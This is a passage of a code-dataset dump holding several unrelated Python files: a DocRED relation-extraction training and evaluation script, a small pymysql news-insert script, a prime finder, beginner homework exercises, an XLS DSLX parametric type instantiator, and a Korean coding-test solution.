f in features:\r\n        hts = f['hts']\r\n        h_idx += [ht[0] for ht in hts] # take the head entity\r\n        t_idx += [ht[1] for ht in hts]\r\n        title += [f[\"title\"] for ht in hts]\r\n\r\n    res = []\r\n    for i in range(preds.shape[0]): # take the predicted relation types\r\n        pred = preds[i]\r\n        pred = np.nonzero(pred)[0].tolist()\r\n        for p in pred:\r\n            if p != 0:\r\n                res.append(\r\n                    {\r\n                        'title': title[i],\r\n                        'h_idx': h_idx[i],\r\n                        't_idx': t_idx[i],\r\n                        'r': id2rel[p]\r\n                    }\r\n                )\r\n    if len(res) > 0:\r\n        best_p, best_r, best_f1, _, best_f1_ign, _ = official_evaluate(res,args.data_dir)\r\n    else:\r\n        # No predictions were produced; report zero scores instead of touching undefined names.\r\n        best_p = best_r = best_f1 = best_f1_ign = 0.0\r\n    output = {\r\n        \"{}_p\".format(tag): best_p * 100,\r\n        \"{}_r\".format(tag): best_r * 100,\r\n        \"{}_f1\".format(tag): best_f1 * 100,\r\n        \"{}_f1_ign\".format(tag): best_f1_ign * 100,\r\n    }\r\n    return best_f1, output\r\n\r\n
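# Illustrative example (added; not part of the original script): each row of `preds`\r\n# is a multi-hot vector over the relation label space, so a row with ones at class\r\n# indices 3 and 40 for pair i expands into two submission entries, e.g.\r\n#   {'title': title[i], 'h_idx': h_idx[i], 't_idx': t_idx[i], 'r': id2rel[3]}\r\n# which official_evaluate below compares against the gold triples.\r\n\r\n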
def gen_train_facts(data_file_name, truth_dir):\r\n    fact_file_name = data_file_name[data_file_name.find(\"train_\"):]\r\n    fact_file_name = os.path.join(truth_dir, fact_file_name.replace(\".json\", \".fact\"))\r\n\r\n    if os.path.exists(fact_file_name):\r\n        fact_in_train = set([])\r\n        triples = json.load(open(fact_file_name))\r\n        for x in triples:\r\n            fact_in_train.add(tuple(x))\r\n        return fact_in_train\r\n\r\n    fact_in_train = set([])\r\n    ori_data = json.load(open(data_file_name))\r\n    for data in ori_data:\r\n        vertexSet = data['vertexSet']\r\n        for label in data['labels']:\r\n            rel = label['r']\r\n            for n1 in vertexSet[label['h']]:\r\n                for n2 in vertexSet[label['t']]:\r\n                    fact_in_train.add((n1['name'], n2['name'], rel)) # used later to score predictions against the answers\r\n\r\n    json.dump(list(fact_in_train), open(fact_file_name, \"w\"))\r\n\r\n    return fact_in_train\r\n\r\n\r\ndef official_evaluate(tmp, path):\r\n    '''\r\n    Adapted from the official evaluation code\r\n    '''\r\n    truth_dir = os.path.join(path, 'ref')\r\n\r\n    if not os.path.exists(truth_dir):\r\n        os.makedirs(truth_dir)\r\n\r\n    fact_in_train_annotated = gen_train_facts(os.path.join(path, \"train_annotated.json\"), truth_dir)\r\n    fact_in_train_distant = gen_train_facts(os.path.join(path, \"train_distant.json\"), truth_dir)\r\n\r\n    truth = json.load(open(os.path.join(path, \"dev.json\")))\r\n\r\n    std = {} # evidence sentence set for each gold relation triple\r\n    tot_evidences = 0 # total number of evidence sentences over all gold relations\r\n    titleset = set([])\r\n\r\n    title2vertexSet = {}\r\n\r\n    for x in truth:\r\n        title = x['title']\r\n        titleset.add(title)\r\n\r\n        vertexSet = x['vertexSet']\r\n        title2vertexSet[title] = vertexSet\r\n\r\n        for label in x['labels']:\r\n            r = label['r']\r\n            h_idx = label['h']\r\n            t_idx = label['t']\r\n            std[(title, r, h_idx, t_idx)] = set(label['evidence'])\r\n            tot_evidences += len(label['evidence'])\r\n\r\n    tot_relations = len(std)\r\n    tmp.sort(key=lambda x: (x['title'], x['h_idx'], x['t_idx'], x['r']))\r\n    submission_answer = [tmp[0]]\r\n    for i in range(1, len(tmp)):\r\n        x = tmp[i]\r\n        y = tmp[i - 1]\r\n        if (x['title'], x['h_idx'], x['t_idx'], x['r']) != (y['title'], y['h_idx'], y['t_idx'], y['r']):\r\n            submission_answer.append(tmp[i]) # keep only distinct predictions\r\n\r\n    correct_re = 0\r\n    correct_evidence = 0\r\n    pred_evi = 0\r\n\r\n    correct_in_train_annotated = 0\r\n    correct_in_train_distant = 0\r\n    titleset2 = set([])\r\n    for x in submission_answer:\r\n        title = x['title']\r\n        h_idx = x['h_idx']\r\n        t_idx = x['t_idx']\r\n        r = x['r']\r\n        titleset2.add(title)\r\n        if title not in title2vertexSet:\r\n            continue\r\n        vertexSet = title2vertexSet[title]\r\n\r\n        if 'evidence' in x:\r\n            evi = set(x['evidence'])\r\n        else:\r\n            evi = set([])\r\n        pred_evi += len(evi)\r\n\r\n        if (title, r, h_idx, t_idx) in std:\r\n            correct_re += 1 # the predicted triple is in the gold labels, so TP += 1\r\n            stdevi = std[(title, r, h_idx, t_idx)]\r\n            correct_evidence += len(stdevi & evi)\r\n            in_train_annotated = in_train_distant = False\r\n            for n1 in vertexSet[h_idx]:\r\n                for n2 in vertexSet[t_idx]:\r\n                    if (n1['name'], n2['name'], r) in fact_in_train_annotated:\r\n                        in_train_annotated = True\r\n                    if (n1['name'], n2['name'], r) in fact_in_train_distant:\r\n                        in_train_distant = True\r\n\r\n            if in_train_annotated:\r\n                correct_in_train_annotated += 1\r\n            if in_train_distant:\r\n                correct_in_train_distant += 1\r\n\r\n    re_p = 1.0 * correct_re / len(submission_answer) # precision\r\n    re_r = 1.0 * correct_re / tot_relations # recall\r\n    if re_p + re_r == 0:\r\n        re_f1 = 0\r\n    else:\r\n        re_f1 = 2.0 * re_p * re_r / (re_p + re_r) # F1\r\n\r\n
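    # Worked example (added): with 100 distinct predicted triples of which 80 are in\r\n    # the gold set and 200 gold triples in total, re_p = 0.8, re_r = 0.4 and\r\n    # re_f1 = 2 * 0.8 * 0.4 / (0.8 + 0.4) ~= 0.533. The *_ignore_train scores below\r\n    # apply the same formula after discounting triples already seen in the training facts.\r\n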
    evi_p = 1.0 * correct_evidence / pred_evi if pred_evi > 0 else 0\r\n    evi_r = 1.0 * correct_evidence / tot_evidences\r\n    if evi_p + evi_r == 0:\r\n        evi_f1 = 0\r\n    else:\r\n        evi_f1 = 2.0 * evi_p * evi_r / (evi_p + evi_r)\r\n\r\n    re_p_ignore_train_annotated = 1.0 * (correct_re - correct_in_train_annotated) / (len(submission_answer) - correct_in_train_annotated + 1e-5)\r\n    re_p_ignore_train = 1.0 * (correct_re - correct_in_train_distant) / (len(submission_answer) - correct_in_train_distant + 1e-5)\r\n\r\n    if re_p_ignore_train_annotated + re_r == 0:\r\n        re_f1_ignore_train_annotated = 0\r\n    else:\r\n        re_f1_ignore_train_annotated = 2.0 * re_p_ignore_train_annotated * re_r / (re_p_ignore_train_annotated + re_r)\r\n\r\n    if re_p_ignore_train + re_r == 0:\r\n        re_f1_ignore_train = 0\r\n    else:\r\n        re_f1_ignore_train = 2.0 * re_p_ignore_train * re_r / (re_p_ignore_train + re_r)\r\n\r\n    return re_p, re_r, re_f1, evi_f1, re_f1_ignore_train_annotated, re_f1_ignore_train\r\n\r\ndef report(args, model, features, tag = \"test\"):\r\n\r\n    dataloader = DataLoader(features, batch_size=args.test_batch_size, shuffle=False, collate_fn=collate_fn, drop_last=False)\r\n    preds = []\r\n    for batch in dataloader:\r\n        model.eval()\r\n        adjacency = convert_3dsparse_to_4dsparse(batch[5]).to(args.device)\r\n        inputs = {'input_ids': batch[0].to(args.device),\r\n                  'attention_mask': batch[1].to(args.device),\r\n                  'entity_pos': batch[3],\r\n                  'hts': batch[4],\r\n                  'adjacency': adjacency,\r\n                  'link_pos': batch[6],\r\n                  'nodes_info': batch[7],\r\n                  }\r\n\r\n        with torch.no_grad():\r\n            pred, *_ = model(**inputs)\r\n            pred = pred.cpu().numpy()\r\n            pred[np.isnan(pred)] = 0\r\n            preds.append(pred)\r\n\r\n    preds = np.concatenate(preds, axis=0).astype(np.float32)\r\n\r\n    # Compute the results:\r\n    # first build the predicted relation instances {'title': ; 'h_idx': ; 't_idx': ; 'r': } from preds and features\r\n    h_idx, t_idx, title = [], [], []  # head/tail entity indices and document titles\r\n\r\n    for f in features:\r\n        hts = f['hts']\r\n        h_idx += [ht[0] for ht in hts]  # take the head entity\r\n        t_idx += [ht[1] for ht in hts]\r\n        title += [f[\"title\"] for ht in hts]\r\n\r\n    res = []\r\n    for i in range(preds.shape[0]):  # take the predicted relation types\r\n        pred = preds[i]\r\n        pred = np.nonzero(pred)[0].tolist()\r\n        for p in pred:\r\n            if p != 0:\r\n                res.append(\r\n                    {\r\n                        'title': title[i],\r\n                        'h_idx': h_idx[i],\r\n                        't_idx': t_idx[i],\r\n                        'r': id2rel[p]\r\n                    }\r\n                )\r\n    return res\r\n\r\n\r\n\r\n\r\ndef humanized_time(second):\r\n    \"\"\"\r\n    :param second: time in seconds\r\n    :return: human readable time (hours, minutes, seconds)\r\n    \"\"\"\r\n    m, s = divmod(second, 60)\r\n    h, m = divmod(m, 60)\r\n    return \"%dh %02dm %02ds\" % (h, m, s)\r\n\r\n\r\ndef main():\r\n    parser = argparse.ArgumentParser()\r\n\r\n    parser.add_argument(\"--data_dir\", default=\"./dataset/docred\", type=str)\r\n    parser.add_argument(\"--transformer_type\", default=\"bert\", type=str)\r\n    parser.add_argument(\"--model_name_or_path\", default=\"bert-base-cased\", type=str)\r\n    parser.add_argument(\"--train_file\", default=\"train_annotated.json\", type=str)\r\n    parser.add_argument(\"--dev_file\", default=\"dev.json\", type=str)\r\n    parser.add_argument(\"--test_file\", default=\"test.json\", type=str)\r\n    parser.add_argument(\"--save_path\", default=\"./saved_model/docred.model\", type=str)\r\n    parser.add_argument(\"--load_path\", default=\"\", type=str)\r\n\r\n    parser.add_argument(\"--config_name\", default=\"\", type=str,\r\n                        help=\"Pretrained config name or path if not the same as model_name\")\r\n    parser.add_argument(\"--tokenizer_name\", default=\"\", type=str,\r\n                        help=\"Pretrained tokenizer name or path if not the same as model_name\")\r\n    parser.add_argument(\"--max_seq_length\", default=1024, 
type=int,\r\n help=\"The maximum total input sequence length after tokenization. Sequences longer \"\r\n \"than this will be truncated, sequences shorter will be padded.\")\r\n parser.add_argument(\"--max_entity_number\", default=35, type=int,\r\n help=\"the max entity number in dataset.\")\r\n\r\n parser.add_argument(\"--train_batch_size\", default=4, type=int,\r\n help=\"Batch size for training.\")\r\n parser.add_argument(\"--test_batch_size\", default=8, type=int,\r\n help=\"Batch size for testing.\")\r\n parser.add_argument(\"--gradient_accumulation_steps\", default=1, type=int,\r\n help=\"Number of updates steps to accumulate before performing a backward/update pass.\")\r\n parser.add_argument(\"--num_labels\", default=1, type=int,\r\n help=\"Max number of labels in the prediction.\")\r\n parser.add_argument(\"--learning_rate\", default=3e-5, type=float,\r\n help=\"The initial learning rate for Adam.\")\r\n parser.add_argument(\"--adam_epsilon\", default=1e-6, type=float,\r\n help=\"Epsilon for Adam optimizer.\")\r\n parser.add_argument(\"--max_grad_norm\", default=1.0, type=float,\r\n help=\"Max gradient norm.\")\r\n parser.add_argument(\"--warmup_ratio\", default=0.06, type=float,\r\n help=\"Warm up ratio for Adam.\")\r\n parser.add_argument(\"--num_train_epochs\", default=30, type=float,\r\n help=\"Total number of training epochs to perform.\")\r\n parser.add_argument(\"--evaluation_steps\", default=-1, type=int,\r\n help=\"Number of training steps between evaluations.\")\r\n parser.add_argument(\"--seed\", type=int, default=66,\r\n help=\"random seed for initialization.\")\r\n parser.add_argument(\"--num_class\", type=int, default=97,\r\n help=\"Number of relation types in dataset.\")\r\n\r\n args = parser.parse_args()\r\n # wandb.init(project=\"CDR\")\r\n\r\n device = torch.device(\"cuda:1\" if torch.cuda.is_available() else \"cpu\")\r\n args.n_gpu = torch.cuda.device_count()\r\n args.device = device\r\n\r\n config = AutoConfig.from_pretrained(\r\n args.config_name if args.config_name else args.model_name_or_path,\r\n num_labels = args.num_class\r\n )\r\n tokenizer = AutoTokenizer.from_pretrained(\r\n args.tokenizer_name if args.tokenizer_name else args.model_name_or_path,\r\n )\r\n\r\n read = read_docred\r\n\r\n train_file = os.path.join(args.data_dir, args.train_file)\r\n dev_file = os.path.join(args.data_dir, args.dev_file)\r\n test_file = os.path.join(args.data_dir, args.test_file)\r\n train_features = read(train_file, tokenizer, max_seq_length=args.max_seq_length)\r\n dev_features = read(dev_file, tokenizer, max_seq_length=args.max_seq_length)\r\n test_features = read(test_file, tokenizer, max_seq_length=args.max_seq_length)\r\n\r\n model = AutoModel.from_pretrained(\r\n args.model_name_or_path,\r\n from_tf=bool(\".ckpt\" in args.model_name_or_path),\r\n config=config,\r\n )\r\n\r\n config.cls_token_id = tokenizer.cls_token_id\r\n config.sep_token_id = tokenizer.sep_token_id\r\n config.transformer_type = args.transformer_type\r\n\r\n set_seed(args)\r\n # model = DocREModel(config, model, num_labels=args.num_labels)\r\n model = DocREModel(config, model, num_labels=args.num_labels, max_entity=args.max_entity_number)\r\n model.to(args.device)\r\n\r\n if args.load_path == \"\": #training\r\n train(args, model, train_features, dev_features)\r\n else: #testing\r\n # model = amp.initialize(model, opt_level=\"O1\", verbosity=0)\r\n model.load_state_dict(torch.load(args.load_path))\r\n dev_score, dev_output = evaluate(args, model, dev_features, tag=\"dev\")\r\n print(dev_output)\r\n 
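# report() below emits DocRED-style submission entries; a representative\r\n        # (hypothetical) element of `pred` looks like\r\n        #   {'title': 'Some Document', 'h_idx': 0, 't_idx': 3, 'r': 'P17'}\r\n        # and the list is what result.json is expected to contain.\r\n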
        pred = report(args, model, test_features, tag=\"test\")\r\n        with open(\"result.json\", \"w\") as fh:\r\n            json.dump(pred, fh)\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    main()\r\n","repo_name":"passengeryjy/ESGR","sub_path":"train_red.py","file_name":"train_red.py","file_ext":"py","file_size_in_byte":19255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"22869220107","text":"import pymysql\n\nconn = None\ncur = None\n\ndata1=\"\"\ndata2=\"\"\ndata3=\"\"\ndata4=\"\"\n\nsql = \"\"\n\nconn = pymysql.connect(host='127.0.0.1', user='root', password='2021011545', db='news', charset='utf8')\ncur = conn.cursor()\n\nwhile(True):\n    data1 = input(\"Channel ID: \")\n    if data1 == \"\":\n        break\n    data2 = input(\"Video ID: \")\n    data3 = input(\"Title: \")\n    data4 = input(\"Content: \")\n    sql = \"INSERT INTO news (channel_id, video_id, title, summary) VALUES(%s, %s, %s, %s)\"\n    values = (data1, data2, data3, data4)\n    cur.execute(sql, values)\n\nconn.commit()\nconn.close()","repo_name":"HyeahnLee/database","sub_path":"myproject/golden.py","file_name":"golden.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"74732794188","text":"import math\r\n\r\nintLength = int(input(\"How many?\"))\r\n\r\nfrom datetime import datetime\r\ntstart = datetime.now()\r\n\r\nlstPrimes = list()\r\nintCurrent = 3\r\nlstPrimes.append(2)\r\n\r\nwhile(len(lstPrimes) < intLength):\r\n    blPrime = True\r\n    y = 2\r\n    while(y < math.sqrt(intCurrent) + 1 and blPrime): \r\n        if(intCurrent % y == 0):\r\n            blPrime=False\r\n        y += 1\r\n    if(blPrime):\r\n        #print(intCurrent)\r\n        lstPrimes.append(intCurrent)\r\n    intCurrent += 2\r\n\r\n#print(lstPrimes)\r\nprint('Answer:' + str(intCurrent - 2))\r\nprint('Time = ' + str(datetime.now() - tstart))\r\n","repo_name":"xnbya/pythonstuff","sub_path":"python/primes.py","file_name":"primes.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"}
{"seq_id":"43594575364","text":"#Form a list of the first N terms of the sequence.\n#For N = 5: 1, -3, 9, -27, 81, etc.\n\ndef num(a):\n    list=[]\n    for i in range(0,a):\n        list.append((-3)**i)\n    print(list)\nnum(5)\n\n\n#Write a program that produces the set of products of the numbers from 1 to N.\n#Example: let N = 4, then\n#[ 1, 2, 6, 24 ]\ndef num(a):\n    num=1\n    for i in range(1,a+1):\n        num = num*i\n        print(num)\nnum(4)\n\n\n#Count the sum of the digits of a real number.\n\nnum= input(\"Enter a real number: \")\nnum1 = num.split(\".\") \nintnum=int(num1[0])\ndigitnum=int(num1[1])\nsum=0\nwhile intnum>0:\n    sum=sum+(intnum%10)\n    intnum=intnum//10\nwhile digitnum>0:\n    sum=sum+(digitnum%10)\n    digitnum=digitnum//10\nprint(sum)","repo_name":"Dasha550/Homework_Python","sub_path":"CorrectionOnMistakesHomeWork1.py","file_name":"CorrectionOnMistakesHomeWork1.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"8503791587","text":"from typing import Any, Text, Dict, Tuple, Optional\n\nfrom absl import logging\n\nfrom xls.dslx import parametric_expression\nfrom xls.dslx.concrete_type import ArrayType\nfrom xls.dslx.concrete_type import BitsType\nfrom xls.dslx.concrete_type import ConcreteType\nfrom xls.dslx.concrete_type import EnumType\nfrom xls.dslx.concrete_type import FunctionType\nfrom xls.dslx.concrete_type import TupleType\nfrom xls.dslx.span import Span\nfrom xls.dslx.xls_type_error 
import ArgCountMismatchError\nfrom xls.dslx.xls_type_error import XlsTypeError\n\nInvocation = Any # pylint: disable=invalid-name\nSymbolicBindings = Tuple[Tuple[Text, int], ...]\nParametricBinding = Any\nParametricBindings = Tuple[ParametricBinding, ...]\nDeduceCtx = Any\nExpr = Any\n\n\nclass _ParametricInstantiator(object):\n \"\"\"Helper class for instantiating a parametric invocation.\n\n Attributes:\n span: Span for the instantiation; e.g. of the invocation AST node being\n instantiated.\n function_type: (Parametric) function type being instantiated.\n arg_types: Argument types presented to the parametric function type.\n symbolic_bindings: Mapping from name to bound value as encountered in the\n instantiation process; e.g. instantiating `fn [N: u32] id(bits[N]) ->\n bits[N]` with a u32 would lead to `{'N': 32}` as the symbolic bindings.\n constraints: Mapping from parametric to its expression.\n e.g. For [X: u32, Y: u32 = X + X], we'd have X -> (32, None) and\n Y -> (32, (X + X)).\n bit_widths: Mapping from parametric to its bit count\n e.g. From above, X -> 32 and Y -> 32\n\n ctx: Wrapper over useful typechecking objects (see deduce.DeduceCtx).\n \"\"\"\n\n def __init__(self, span: Span, function_type: ConcreteType,\n arg_types: Tuple[ConcreteType, ...], ctx: DeduceCtx,\n parametric_constraints: Optional[ParametricBindings]):\n self.span = span\n self.function_type = function_type\n self.arg_types = arg_types\n self.ctx = ctx\n self.symbolic_bindings = {} # type: Dict[Text, int]\n self.constraints = {} # type: Dict[Text, Optional[Expr]]\n self.bit_widths = {} # type: Dict[Text, int]\n\n param_types = self.function_type.get_function_params()\n if len(self.arg_types) != len(param_types):\n raise ArgCountMismatchError(self.span, arg_types, len(param_types),\n param_types,\n 'Invocation of parametric function.')\n if parametric_constraints:\n for b in parametric_constraints:\n bit_count = b.type_.primitive_to_bits()\n self.bit_widths[b.name.identifier] = bit_count\n self.constraints[b.name.identifier] = b.expr\n\n def _verify_constraints(self) -> None:\n \"\"\"Verifies that all parametrics adhere to signature constraints.\n\n Take the following function signature for example:\n fn [X: u32, Y: u32 = X + X] f(x: bits[X], y: bits[Y]) -> bits[Y]\n\n The parametric Y has two constraints based only off the signature:\n it must match the bitwidth of the argument y and it must be equal to\n X + X. This function is responsible for computing any derived parametrics\n and asserting that their values are consistent with other constraints\n (arg types).\n \"\"\"\n for binding, constraint in self.constraints.items():\n if constraint is None:\n # e.g. 
[X: u32]\n continue\n try:\n fn_name, fn_symbolic_bindings = self.ctx.fn_stack[-1]\n fn_ctx = (self.ctx.module.name, fn_name,\n tuple(fn_symbolic_bindings.items()))\n result = self.ctx.interpret_expr(\n self.ctx.module,\n self.ctx.node_to_type,\n self.symbolic_bindings,\n self.bit_widths,\n constraint,\n fn_ctx=fn_ctx)\n except KeyError as e:\n # We haven't seen enough bindings to evaluate this constraint.\n continue\n\n if binding in self.symbolic_bindings.keys():\n if result != self.symbolic_bindings[binding]:\n raise XlsTypeError(\n self.span,\n BitsType(signed=False, size=self.symbolic_bindings[binding]),\n BitsType(signed=False, size=result),\n suffix=f'Parametric constraint violated, saw {binding} = {constraint} = {result}; '\n f'then {binding} = {self.symbolic_bindings[binding]}')\n else:\n self.symbolic_bindings[binding] = result\n\n def _symbolic_bind_dims(self, param_type: ConcreteType,\n arg_type: ConcreteType) -> None:\n \"\"\"Binds parametric symbols in param_type according to arg_type.\"\"\"\n # Create bindings for symbolic parameter dimensions based on argument\n # values passed.\n param_dim = param_type.size\n arg_dim = arg_type.size\n if not isinstance(param_dim, parametric_expression.ParametricSymbol):\n return\n\n pdim_name = param_dim.identifier\n if (pdim_name in self.symbolic_bindings and\n self.symbolic_bindings[pdim_name] != arg_dim):\n if self.constraints[pdim_name]:\n # Error on violated constraint.\n raise XlsTypeError(\n self.span,\n BitsType(signed=False, size=self.symbolic_bindings[pdim_name]),\n arg_type,\n suffix=f'Parametric constraint violated, saw {pdim_name} '\n f'= {self.constraints[pdim_name]} '\n f'= {self.symbolic_bindings[pdim_name]}; '\n f'then {pdim_name} = {arg_dim}')\n else:\n # Error on conflicting argument types.\n raise XlsTypeError(\n self.span,\n param_type,\n arg_type,\n suffix='Parametric value {} was bound to different values at '\n 'different places in invocation; saw: {!r}; then: {!r}'.format(\n pdim_name, self.symbolic_bindings[pdim_name], arg_dim))\n\n logging.vlog(2, 'Binding %r to %s', pdim_name, arg_dim)\n self.symbolic_bindings[pdim_name] = arg_dim\n\n def _symbolic_bind_bits(self, param_type: ConcreteType,\n arg_type: ConcreteType) -> None:\n \"\"\"Binds any parametric symbols in the \"bits\" param_type.\"\"\"\n assert isinstance(param_type, ConcreteType), repr(param_type)\n assert isinstance(arg_type, ConcreteType), repr(arg_type)\n assert (type(param_type) == type(arg_type) # pylint: disable=unidiomatic-typecheck\n and isinstance(param_type, (BitsType, EnumType)))\n\n if isinstance(param_type, EnumType):\n return # Enums have no size.\n\n self._symbolic_bind_dims(param_type, arg_type)\n\n def _symbolic_bind_tuple(self, param_type: ConcreteType,\n arg_type: ConcreteType):\n \"\"\"Binds any parametric symbols in the \"tuple\" param_type.\"\"\"\n assert isinstance(param_type, TupleType) and isinstance(arg_type, TupleType)\n for param_member, arg_member in zip(param_type.get_unnamed_members(),\n arg_type.get_unnamed_members()):\n self._symbolic_bind(param_member, arg_member)\n\n def _symbolic_bind_array(self, param_type: ConcreteType,\n arg_type: ConcreteType):\n \"\"\"Binds any parametric symbols in the \"array\" param_type.\"\"\"\n assert isinstance(param_type, ArrayType) and isinstance(arg_type, ArrayType)\n self._symbolic_bind(param_type.get_element_type(),\n arg_type.get_element_type())\n self._symbolic_bind_dims(param_type, arg_type)\n\n def _symbolic_bind_function(self, param_type: ConcreteType,\n arg_type: ConcreteType):\n 
\"\"\"Binds any parametric symbols in the \"function\" param_type.\"\"\"\n assert isinstance(param_type, FunctionType) and isinstance(\n arg_type, FunctionType)\n for param_param, arg_param in zip(param_type.get_function_params(),\n arg_type.get_function_params()):\n self._symbolic_bind(param_param, arg_param)\n self._symbolic_bind(param_type.get_function_return_type(),\n arg_type.get_function_return_type())\n\n def _symbolic_bind(self, param_type: ConcreteType,\n arg_type: ConcreteType) -> None:\n \"\"\"Binds symbols present in param_type according to value of arg_type.\"\"\"\n assert isinstance(param_type, ConcreteType), repr(param_type)\n assert isinstance(arg_type, ConcreteType), repr(arg_type)\n if isinstance(param_type, BitsType):\n self._symbolic_bind_bits(param_type, arg_type)\n elif isinstance(param_type, EnumType):\n assert param_type.nominal_type == arg_type.nominal_type\n # If the enums are the same, we do the same thing as we do with bits\n # (ignore the primitive and symbolic bind the dims).\n self._symbolic_bind_bits(param_type, arg_type)\n elif isinstance(param_type, TupleType):\n if param_type.nominal_type != arg_type.nominal_type:\n raise XlsTypeError(\n self.span,\n param_type,\n arg_type,\n suffix='parameter type name: {}; argument type name: {}.'.format(\n repr(param_type.nominal_type.identifier)\n if param_type.nominal_type else '',\n repr(arg_type.nominal_type.identifier)\n if arg_type.nominal_type else ''))\n self._symbolic_bind_tuple(param_type, arg_type)\n elif isinstance(param_type, ArrayType):\n self._symbolic_bind_array(param_type, arg_type)\n elif isinstance(param_type, FunctionType):\n self._symbolic_bind_function(param_type, arg_type)\n else:\n raise NotImplementedError('Bind symbols in parameter type {} @ {}'.format(\n param_type, self.span))\n\n def _instantiate_one_arg(self, i: int, param_type: ConcreteType,\n arg_type: ConcreteType) -> ConcreteType:\n \"\"\"Binds param_type via arg_type, updating symbolic bindings.\"\"\"\n assert isinstance(param_type, ConcreteType), repr(param_type)\n assert isinstance(arg_type, ConcreteType), repr(arg_type)\n # Check parameter and arg types are the same kind.\n if type(param_type) != type(arg_type): # pylint: disable=unidiomatic-typecheck\n raise XlsTypeError(\n self.span,\n param_type,\n arg_type,\n suffix='Parameter {} and argument types are different kinds ({} vs {})'\n ' in invocation which has type `{}`.'.format(\n i, param_type.get_debug_type_name(),\n arg_type.get_debug_type_name(), self.function_type))\n\n logging.vlog(3, 'Symbolically binding param_type %d %s against arg_type %s',\n i, param_type, arg_type)\n self._symbolic_bind(param_type, arg_type)\n resolved = self._resolve(param_type)\n logging.vlog(3, 'Resolved param_type: %s', resolved)\n return resolved\n\n def _resolve(self, annotated: ConcreteType) -> ConcreteType:\n \"\"\"Resolves a parametric type via symbolic_bindings.\"\"\"\n\n if self.constraints:\n self._verify_constraints()\n\n def resolver(dim):\n if isinstance(dim, parametric_expression.ParametricExpression):\n return dim.evaluate(self.symbolic_bindings)\n return dim\n\n return annotated.map_size(resolver)\n\n def instantiate(self) -> Tuple[ConcreteType, SymbolicBindings]:\n \"\"\"Updates symbolic bindings for the parameter types according to arg_types.\n\n Instantiates the parameters of function_type according to the presented\n arg_types; e.g. 
when a bits[3,4] argument is passed to a bits[N,M]\n    parameter, we note that N=3 and M=4 for resolution in the return type.\n\n    Returns:\n      The return type of the function_type, with parametric types instantiated\n      in accordance with the presented argument types.\n    \"\"\"\n    # Walk through all the params/args to collect symbolic bindings.\n    for i, (param_type, arg_type) in enumerate(\n        zip(self.function_type.get_function_params(), self.arg_types)):\n      param_type = self._instantiate_one_arg(i, param_type, arg_type)\n      logging.vlog(\n          3, 'Post-instantiation; paramno: %d; param_type: %s; arg_type: %s', i,\n          param_type, arg_type)\n      if param_type != arg_type:\n        message = 'Mismatch between parameter and argument types.'\n        if str(param_type) == str(arg_type):\n          message += ' {!r} vs {!r}'.format(param_type, arg_type)\n        raise XlsTypeError(self.span, param_type, arg_type, suffix=message)\n\n    # Resolve the return type according to the bindings we collected.\n    orig = self.function_type.get_function_return_type()\n    resolved = self._resolve(orig)\n    logging.vlog(2, 'Resolved return type from %s to %s', orig, resolved)\n    return resolved, tuple(sorted(self.symbolic_bindings.items()))\n\n\ndef instantiate(\n    span: Span, callee_type: ConcreteType,\n    arg_types: Tuple[ConcreteType, ...],\n    ctx: DeduceCtx,\n    parametric_bindings: Optional[ParametricBindings]) \\\n    -> Tuple[ConcreteType, SymbolicBindings]:\n  return _ParametricInstantiator(span, callee_type, arg_types, ctx,\n                                 parametric_bindings).instantiate()\n","repo_name":"julianviera99/xls","sub_path":"xls/dslx/parametric_instantiator.py","file_name":"parametric_instantiator.py","file_ext":"py","file_size_in_byte":12908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
+{"seq_id":"35980826267","text":"# Newly learned built-in: bin(x) converts the decimal number x to binary.\n# base-n -> decimal : int(string, base)\n# decimal -> base 2, 8, 16 : bin(), oct(), hex() \n# These prefix the result with 0b (0o, 0x), so strip it with [2:]\n\ndef solution(n, arr1, arr2): # convert the decimals in arr1 and arr2 to binary with bin() and store them per row\n    lst1 = [] \n    for i in arr1:\n        a = bin(i) \n        a = a[2:] # strip the leading 0b before using the value\n        if len(a) < n: # pad with zeros via zfill so the row is exactly n digits wide\n            a = a.zfill(n)\n            lst1.append(a)\n        else:\n            lst1.append(a)\n    \n    lst2 = [] # same as above\n    for j in arr2:\n        b = bin(j)\n        b = b[2:]\n        if len(b) < n:\n            b = b.zfill(n)\n            lst2.append(b)\n        else:\n            lst2.append(b)\n    answer = ['' for _ in range(n)] # build the result array out of n empty strings\n    \n    for k in range(n): # walk lst1 and lst2 together; if either bit is 1 append \"#\", otherwise a space\n        for l in range(n):\n            if lst1[k][l] == \"1\" or lst2[k][l] == \"1\":\n                answer[k] += \"#\"\n            else:\n                answer[k] += \" \"\n    return answer
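\n\n# An equivalent one-liner sketch (hedged; it relies only on the built-ins noted above):\n# def solution(n, arr1, arr2):\n#     return [bin(a | b)[2:].zfill(n).replace(\"1\", \"#\").replace(\"0\", \" \")\n#             for a, b in zip(arr1, arr2)]","repo_name":"BellOne4222/Coding_Test_Repo","sub_path":"프로그래머스/lv1/17681. [1차] 비밀지도/[1차] 비밀지도.py","file_name":"[1차] 비밀지도.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"}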
